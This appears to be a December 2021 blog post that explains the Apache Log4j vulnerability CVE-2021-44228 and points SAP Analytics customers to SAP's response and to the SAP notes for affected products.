Wednesday, December 15, 2021

Security vulnerability Apache Log4j

On Dec 10th an information about security vulnerability related to Apache Log4j software surfaced on internet. The Apache Log4j is an open-source library written in Java. It is used in many software packages based on JAVA for logging purposes. Issue in brief is that an attacker who can control log messages or log message parameters can execute arbitrary code when message lookup substitution is enabled. The issue was identified in log4j2 version and fixed in log4j 2.15.0 The vulnerability got its CVE (Common Vulnerabilities and Exposures) code as CVE-2021-44228 (or CVE-2021-44228). The CVE has a CVSS score of 10 - the most critical rating!

SAP as many other software vendors around the world is following up on this issue. Assessment whether and how the Log4j is used within the software is going on. In case the particular software is affected by the vulnerability, the software vendor shall release patch to fix it. At the time of writing this blog post SAP has released statement where the software that is/is not/not know yet affected is listed. Particular SAP Notes are listed in the statement so customers can follow up and implement patches.

From SAP Analytics solutions perspective there are SAP solutions that use the Log4j library. Therefore, SAP customer should closely monitor (see links below) this topic and take an action on software patching if they use any software that is identified as impacted.


More information:

SAP’s Response to CVE-2021-44228 Apache Log4j 2

Search the SAP Community for log4j

3129956 - CVE-2021-44228 - BusinessObjects impact for Log4j vulnerability

3130994 - CVE-2021-44228 - SAP Predictive Analytics impact for Log4j vulnerability

Knowledge Base Search - SAP ONE Support Launchpad


No comments: